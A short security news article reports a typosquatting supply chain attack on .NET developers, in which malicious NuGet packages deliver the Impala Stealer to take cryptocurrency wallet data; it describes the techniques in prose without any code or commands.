Recently, cybersecurity researchers uncovered the techniques used in a sophisticated supply chain attack aimed at .NET developers.
The attack employed 13 malicious NuGet packages, which impersonated legitimate packages, to execute PowerShell code and retrieve a follow-on binary from a hard-coded server.
The attack’s ultimate goal was to deploy Impala Stealer, a .NET-based persistent backdoor, to gain unauthorized access to users’ cryptocurrency accounts.
The Typosquatting Campaign
The attackers used typosquatting techniques to distribute a custom malicious payload. By impersonating legitimate packages, they managed to execute PowerShell code on target systems, which retrieved a follow-on binary from a hard-coded server.
The campaign’s sophistication lay in the rare obfuscation technique called “.NET AoT compilation,” which made the binary harder to reverse engineer and stealthier than using off-the-shelf obfuscators.
Impala Stealer
The second stage of the attack involved the deployment of Impala Stealer, a .NET-based persistent backdoor, which could gain unauthorized access to users’ cryptocurrency accounts.
The binary used an auto-update mechanism to retrieve new versions of the executable from a remote location. It achieved persistence by injecting JavaScript code into Discord or Microsoft Visual Studio Code apps, thereby activating the launch of the stealer binary.
Exfiltration of Sensitive Data
Once the binary was deployed, it searched for the installation of the Exodus Wallet desktop application and inserted JavaScript code into various HTML files.
This code harvested and exfiltrated sensitive data to a hard-coded Discord webhook. The JavaScript snippet was fetched from an online paste website, which had already deleted it. However, it is suspected that the code may have been used to steal user credentials and access other information of interest.
Conclusion
This cryptocurrency stealer malware employed advanced techniques, such as typosquatting and “.NET AoT compilation,” to evade detection and gain unauthorized access to users’ cryptocurrency accounts. The attack’s sophistication highlights the need for developers to be vigilant and adopt robust security measures to protect their systems and users.
